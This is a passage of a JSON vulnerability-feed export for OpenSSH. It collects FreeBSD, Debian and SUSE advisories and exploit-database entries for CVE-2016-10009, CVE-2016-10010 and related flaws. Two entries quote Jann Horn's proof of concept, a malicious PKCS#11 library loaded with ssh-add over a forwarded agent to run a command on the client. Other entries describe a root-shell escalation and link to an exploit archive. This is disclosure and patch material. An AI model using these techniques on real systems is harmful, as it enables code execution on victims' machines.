across the forwarded agent channel: PKCS#11 modules are shared\n\t libraries, so this would result in code execution on the system\n\t running the ssh-agent if the attacker has control of the\n\t forwarded agent-socket (on the host running the sshd server)\n\t and the ability to write to the filesystem of the host running\n\t ssh-agent (usually the host running the ssh client).\n\t (CVE-2016-10009)\nsshd(8): When privilege separation is disabled, forwarded\n\t Unix-domain sockets would be created by sshd(8) with the\n\t privileges of 'root' instead of the authenticated user. This\n\t release refuses Unix-domain socket forwarding when privilege\n\t separation is disabled (Privilege separation has been enabled by\n\t default for 14 years). CVE-2016-10010)\n\n\n", "modified": "2017-01-09T00:00:00", "published": "2016-12-25T00:00:00", "id": "2AEDD15F-CA8B-11E6-A9A5-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/2aedd15f-ca8b-11e6-a9a5-b499baebfeaf.html", "title": "openssh -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2020-08-12T01:03:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-1908", "CVE-2016-10708", "CVE-2016-10011", "CVE-2015-6564", "CVE-2016-10009", "CVE-2016-6515", "CVE-2015-5352", "CVE-2016-3115", "CVE-2017-15906", "CVE-2016-10012", "CVE-2015-6563"], "description": "Package : openssh\nVersion : 1:6.7p1-5+deb8u6\nCVE ID : CVE-2015-5352 CVE-2015-5600 CVE-2015-6563 CVE-2015-6564\n CVE-2016-1908 CVE-2016-3115 CVE-2016-6515 CVE-2016-10009\n CVE-2016-10011 CVE-2016-10012 CVE-2016-10708\n CVE-2017-15906\nDebian Bug : 790798 793616 795711 848716 848717\n\n\nSeveral vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\n OpenSSH incorrectly verified time window deadlines for X connections.\n Remote attackers could take advantage of this flaw to bypass intended\n access restrictions. 
Reported by Jann Horn.\n\nCVE-2015-5600\n\n OpenSSH improperly restricted the processing of keyboard-interactive\n devices within a single connection, which could allow remote attackers\n to perform brute-force attacks or cause a denial of service, in a\n non-default configuration.\n\nCVE-2015-6563\n\n OpenSSH incorrectly handled usernames during PAM authentication. In\n conjunction with an additional flaw in the OpenSSH unprivileged child\n process, remote attackers could make use if this issue to perform user\n impersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\n Moritz Jodeit discovered a use-after-free flaw in PAM support in\n OpenSSH, that could be used by remote attackers to bypass\n authentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\n OpenSSH mishandled untrusted X11 forwarding when the X server disables\n the SECURITY extension. Untrusted connections could obtain trusted X11\n forwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\n OpenSSH improperly handled X11 forwarding data related to\n authentication credentials. Remote authenticated users could make use\n of this flaw to bypass intended shell-command restrictions. Identified\n by github.com/tintinweb.\n\nCVE-2016-6515\n\n OpenSSH did not limit password lengths for password authentication.\n Remote attackers could make use of this flaw to cause a denial of\n service via long strings.\n\nCVE-2016-10009\n\n Jann Horn discovered an untrusted search path vulnerability in\n ssh-agent allowing remote attackers to execute arbitrary local\n PKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\n Jann Horn discovered that OpenSSH did not properly consider the\n effects of realloc on buffer contents. 
This may allow local users to\n obtain sensitive private-key information by leveraging access to a\n privilege-separated child process.\n\nCVE-2016-10012\n\n Guido Vranken discovered that the OpenSSH shared memory manager\n did not ensure that a bounds check was enforced by all compilers,\n which could allow local users to gain privileges by leveraging access\n to a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\n NULL pointer dereference and daemon crash via an out-of-sequence\n NEWKEYS message.\n\nCVE-2017-15906\n\n Michal Zalewski reported that OpenSSH improperly prevent write\n operations in readonly mode, allowing attackers to create zero-length\n files.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:6.7p1-5+deb8u6.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-09-10T08:45:03", "published": "2018-09-10T08:45:03", "id": "DEBIAN:DLA-1500-1:E6BD7", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201809/msg00010.html", "title": "[SECURITY] [DLA 1500-1] openssh security update", "type": "debian", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-30T02:22:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708"], "description": "Package : openssh\nVersion : 1:6.0p1-4+deb7u7\nCVE ID : CVE-2016-10708\n\nOpenSSH was found to be vulnerable to out of order NEWKEYS messages\nwhich could crash the daemon, resulting in a denial of service attack.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1:6.0p1-4+deb7u7.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: 
https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-01-26T21:13:31", "published": "2018-01-26T21:13:31", "id": "DEBIAN:DLA-1257-1:E0ED4", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201801/msg00031.html", "title": "[SECURITY] [DLA 1257-1] openssh security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "suse": [{"lastseen": "2018-07-30T13:53:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708"], "description": "This update for openssh fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2016-10708: Prevent DoS due to crashes caused by out-of-sequence\n NEWKEYS message (bsc#1076957).\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2018-07-28T16:03:16", "published": "2018-07-28T16:03:16", "id": "OPENSUSE-SU-2018:2128-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00045.html", "title": "Security update for openssh (moderate)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-01T07:13:54", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-12-23T00:00:00", "type": "zdt", "title": "OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Exp", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10010"], "modified": "2016-12-23T00:00:00", "href": "https://0day.today/exploit/description/26577", "id": "1337DAY-ID-26577", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010\r\n \r\nThis issue affects OpenSSH if privilege separation is disabled (config option\r\nUsePrivilegeSeparation=no). 
While privilege separation is enabled by default, it\r\nis documented as a hardening option, and therefore disabling it should not\r\ndirectly make a system vulnerable.\r\n \r\nOpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation\r\nis disabled, then on the server side, the forwarding is handled by a child of\r\nsshd that has root privileges. For TCP server sockets, sshd explicitly checks\r\nwhether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if\r\nso, requires the client to authenticate as root. However, for UNIX domain\r\nsockets, no such security measures are implemented.\r\n \r\nThis means that, using \"ssh -L\", an attacker who is permitted to log in as a\r\nnormal user over SSH can effectively connect to non-abstract unix domain sockets\r\nwith root privileges. On systems that run systemd, this can for example be\r\nexploited by asking systemd to add an LD_PRELOAD environment variable for all\r\nfollowing daemon launches and then asking it to restart cron or so. The attached\r\nexploit demonstrates this - if it is executed on a system with systemd where\r\nthe user is allowed to ssh to his own account and where privsep is disabled, it\r\nyields a root shell.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26577", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T03:40:01", "description": "The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. 
The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen).
No checks are performed on the provider name, apart from testing whether that provider is already loaded.\r\n\r\nThis means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.\r\n\r\nTo reproduce the issue, first create a library that executes some command when it is loaded:\r\n\r\n$ cat evil_lib.c\r\n#include <stdlib.h>\r\n__attribute__((constructor)) static void run(void) {\r\n // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,\r\n // prevent recursion through system()\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"LD_LIBRARY_PATH\");\r\n system(\"id > /tmp/test\");\r\n}\r\n$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall\r\n\r\nConnect to another machine using \"ssh -A\". Then, on the remote machine:\r\n\r\n$ ssh-add -s [...]/evil_lib.so\r\nEnter passphrase for PKCS#11: [just press enter here]\r\nSSH_AGENT_FAILURE\r\nCould not add card: [...]/evil_lib.so\r\n\r\nAt this point, the command \"id > /tmp/test\" has been executed on the machine running the ssh agent:\r\n\r\n$ cat /tmp/test\r\nuid=1000(user) gid=1000(user) groups=[...]\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
If 90 days elapse\r\nwithout a broadly available patch, then the bug report will automatically\r\nbecome visible to the public.\r\n\r\n\r\n\r\nFound by: Jann Horn\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/26576"}], "myhack58": [{"lastseen": "2016-12-22T14:53:34", "bulletinFamily": "info", "cvelist": ["CVE-2016-10009"], "edition": 1, "description": "Vulnerability number\nCVE-2016-10009 \nVulnerability level\nIn the risk\nVulnerability\nOpenSSH 7.3 and the following version\nVulnerability description\nThe vulnerability appears the ssh-agent, this process by default does not start, only in a multi-host Free the password the login will only be used to. the sshd server can use the forwarded agent-socket file to trick the machine to the ssh-agent in the trusted white list path other than the load a malicious PKCS#11 module, arbitrary code execution. In other words, a malicious server on the client machine on the remote code execution. \nThis vulnerability of the Use Conditions are relatively harsh, requiring the attacker to control the forwarding agent-socket, and need to have the host file system write permissions. So the official put the vulnerability level rated as medium risk. Based on OpenSSH huge amount of users, there may be a small part of the host will be affected by this. \n! [](/Article/UploadPic/2016-12/20161221201553133. jpg? www. myhack58. com) \nBug fixes\nIn fact, only allows the loading of trusted white list module, you can solve the problem. OpenSSH official has to 12, on 19, released 7. 4 version of OpenSSH that fixes including CVE-2016-10009 including a plurality of Holes. Ubuntu, Debian, etc. the platform also has updated the program. Please timely to the latest version. \n! [](/Article/UploadPic/2016-12/20161221201553424. png? www. myhack58. 
com)\n", "modified": "2016-12-21T00:00:00", "published": "2016-12-21T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82311.htm", "id": "MYHACK58:62201682311", "type": "myhack58", "title": "OpenSSH is now in the risk of vulnerabilities can cause remote code execution-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-23T22:03:13", "description": "", "published": "2016-12-23T00:00:00", "type": "packetstorm", "title": "OpenSSH Arbitrary Library Loading", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10009"], "modified": "2016-12-23T00:00:00", "id": "PACKETSTORM:140261", "href": "https://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html", "sourceData": "`OpenSSH: agent protocol permits loading arbitrary libraries \n \nCVE-2016-10009 \n \n \nThe OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded. \n \nThis means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine. 
\n \nTo reproduce the issue, first create a library that executes some command when it is loaded: \n \n$ cat evil_lib.c \n#include <stdlib.h> \n__attribute__((constructor)) static void run(void) { \n// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, \n// prevent recursion through system() \nunsetenv(\"LD_PRELOAD\"); \nunsetenv(\"LD_LIBRARY_PATH\"); \nsystem(\"id > /tmp/test\"); \n} \n$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall \n \nConnect to another machine using \"ssh -A\". Then, on the remote machine: \n \n$ ssh-add -s [...]/evil_lib.so \nEnter passphrase for PKCS#11: [just press enter here] \nSSH_AGENT_FAILURE \nCould not add card: [...]/evil_lib.so \n \nAt this point, the command \"id > /tmp/test\" has been executed on the machine running the ssh agent: \n \n$ cat /tmp/test \nuid=1000(user) gid=1000(user) groups=[...] \n \nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse \nwithout a broadly available patch, then the bug report will automatically \nbecome visible to the public. \n \n \n \nFound by: Jann Horn \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140261/GS20161223180758.txt"}], "exploitdb": [{"lastseen": "2016-12-23T21:58:38", "description": "OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation. CVE-2016-10010. Local exploit for Linux platform. 
Ta...", "published": "2016-12-23T00:00:00", "type": "exploitdb", "title": "OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10010", "CVE-2016-0778", "CVE-2016-0777"], "modified": "2016-12-23T00:00:00", "id": "EDB-ID:40962", "href": "https://www.exploit-db.com/exploits/40962/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010\r\n\r\nThis issue affects OpenSSH if privilege separation is disabled (config option\r\nUsePrivilegeSeparation=no). While privilege separation is enabled by default, it\r\nis documented as a hardening option, and therefore disabling it should not\r\ndirectly make a system vulnerable.\r\n\r\nOpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation\r\nis disabled, then on the server side, the forwarding is handled by a child of\r\nsshd that has root privileges. For TCP server sockets, sshd explicitly checks\r\nwhether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if\r\nso, requires the client to authenticate as root. However, for UNIX domain\r\nsockets, no such security measures are implemented.\r\n\r\nThis means that, using \"ssh -L\", an attacker who is permitted to log in as a\r\nnormal user over SSH can effectively connect to non-abstract unix domain sockets\r\nwith root privileges. On systems that run systemd, this can for example be\r\nexploited by asking systemd to add an LD_PRELOAD environment variable for all\r\nfollowing daemon launches and then asking it to restart cron or so. 
The attached\r\nexploit demonstrates this - if it is executed on a system with systemd where\r\nthe user is allowed to ssh to his own account and where privsep is disabled, it\r\nyields a root shell.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip\r\n", "cvss": {"score": 4.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40962/"}]}